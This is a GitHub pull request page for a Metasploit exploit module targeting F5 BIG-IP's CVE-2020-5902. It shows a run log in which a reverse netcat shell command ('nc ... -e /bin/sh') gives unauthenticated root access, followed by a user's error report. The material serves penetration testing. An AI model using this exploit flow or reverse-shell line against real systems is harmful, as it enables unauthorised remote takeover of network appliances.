Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add F5 BIG-IP TMUI Directory Traversal and File Upload RCE (CVE-2020-5902) #13807

Merged
merged 10 commits into from Jul 7, 2020

Conversation

wvu
Copy link
Contributor

@wvu wvu commented Jul 5, 2020

Merged: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/f5_bigip_tmui_rce.rb

If you're coming here from the Internet, please use the version in master (linked above), not the original commit. Thank you! See also: #13854 and #14003.

This module should get you a Unix root shell on an affected F5 BIG-IP if all goes well. This is NOT TMSH. It just goes through it. You may need to run the exploit a couple times until I fix the bugs.

msf5 exploit(linux/http/f5_bigip_tmui_rce) > run

[+] nc 172.16.163.1 4444 -e /bin/sh
[*] Started reverse TCP handler on 172.16.163.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Target is running BIG-IP 14.1.2.
[*] Creating alias list=bash
[+] Successfully created alias list=bash
[*] Executing Unix Command for cmd/unix/reverse_netcat_gaping
[*] Executing command: nc 172.16.163.1 4444 -e /bin/sh
[*] Uploading /tmp/VaU9ShHKR9vSa4U2q87Tio
[+] Successfully uploaded /tmp/VaU9ShHKR9vSa4U2q87Tio
[*] Executing /tmp/VaU9ShHKR9vSa4U2q87Tio
[*] Command shell session 1 opened (172.16.163.1:4444 -> 172.16.163.145:39434) at 2020-07-07 12:11:02 -0500
[+] Deleted /tmp/VaU9ShHKR9vSa4U2q87Tio
[*] Deleting alias list=bash
[+] Successfully deleted alias list=bash

id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
uname -a
Linux localhost.localdomain 3.10.0-514.26.2.el7.ve.x86_64 #1 SMP Wed Aug 7 08:16:38 PDT 2019 x86_64 x86_64 x86_64 GNU/Linux

@wvu wvu added delayed feature needs-docs external modules labels Jul 5, 2020
@label-actions
Copy link

label-actions bot commented Jul 5, 2020

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@wvu wvu marked this pull request as draft Jul 5, 2020
@wvu wvu removed the needs-docs label Jul 6, 2020
@wvu wvu marked this pull request as ready for review Jul 7, 2020
@wvu wvu changed the title [WIP] Add F5 BIG-IP TMUI Directory Traversal and File Upload RCE (CVE-2020-5902) Add F5 BIG-IP TMUI Directory Traversal and File Upload RCE (CVE-2020-5902) Jul 7, 2020
@wvu wvu removed the delayed label Jul 7, 2020
@wvu wvu added module and removed external modules labels Jul 7, 2020
@smcintyre-r7 smcintyre-r7 self-assigned this Jul 7, 2020
@smcintyre-r7 smcintyre-r7 merged commit 16ff439 into rapid7:master Jul 7, 2020
3 checks passed
@smcintyre-r7
Copy link
Contributor

smcintyre-r7 commented Jul 7, 2020

Release Notes

The F5 BIG-IP TMUI Directory Traversal and File Upload RCE module exploits a directory traversal vulnerability within the F5 BIG-IP appliance, identified as CVE-2020-5902. The vulnerability is unauthenticated and can be leveraged to obtain remote code execution.

@wvu wvu deleted the feature/f5 branch Jul 7, 2020
@tperry-r7 tperry-r7 added the rn-modules label Jul 9, 2020
@wvu wvu added the docs label Jul 17, 2020
@hackercoolmagz
Copy link

hackercoolmagz commented Sep 18, 2020

I am getting struck at
[] Creating alias list=bash
[-] Encountered java.lang.NullPointerException, retrying!
[
] Creating alias list=bash
[-] Encountered java.lang.NullPointerException, retrying!
[] Creating alias list=bash
[-] Encountered java.lang.NullPointerException, retrying!
[
] Creating alias list=bash
[-] Encountered java.lang.NullPointerException, retrying!
[] Creating alias list=bash
[-] Encountered java.lang.NullPointerException, retrying!
[
] Creating alias list=bash

while running the exploit. Any solution please. I have used the exact payload and set the target to 0 (Unix).

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
docs feature module rn-modules
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

4 participants